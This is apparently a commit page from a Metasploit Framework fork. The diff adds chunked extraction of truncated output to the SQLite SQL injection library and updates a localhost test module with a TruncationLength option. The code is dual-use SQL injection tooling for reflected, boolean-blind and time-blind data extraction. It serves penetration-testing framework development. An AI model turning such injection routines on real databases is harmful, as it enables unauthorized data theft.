dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add truncated SQLi in SQLite, and update test module to add it as an option

This commit is contained in:
Niboucha Redouane 2020-06-25 16:14:25 +02:00
parent 8f9a849591
commit 4374edd37a
2 changed files with 30 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
lib/msf/core/exploit/sqli/sqlitei/common.rb
View File

@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
decode: proc { |data| Rex::Text.hex_to_raw(data) }
}
}.freeze
def initialize(opts, &query_proc)
def initialize(opts={}, &query_proc)
opts[:concat_separator] ||= ','
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
opts[:encoder] = opts[:encoder].downcase.intern
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
private
def truncated_query(query)
result = [ ]
offset = 1
loop do
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
offset += @truncation_length # should be same as @truncation_length for most cases
result << slice
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
break if slice.length < @truncation_length
end
result.join
end
def call_function(function)
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
output = nil

26
test/modules/auxiliary/test/sqlite_lab.rb
View File

@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RHOST('127.0.0.1'),
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
]
)
end
def boolean_blind
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = SQLitei::BooleanBasedBlind.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
hex_encode_strings: datastore['HexEncodeStrings']
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
end
def reflected
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
sqli = SQLitei::Common.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
hex_encode_strings: datastore['HexEncodeStrings'],
truncation_length: truncation
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
if !body
''
else
body.strip
body = body.strip
truncation ? body[0, truncation] : body
end
end
end
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
end
def time_blind
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
sqli = SQLitei::TimeBasedBlind.new({
encoder: encoder,
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
hex_encode_strings: datastore['HexEncodeStrings'],
}) do |payload|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
end
def run
case datastore['SQLI_TYPE']
case datastore['SqliType']
when 0 then reflected
when 1 then boolean_blind
when 2 then time_blind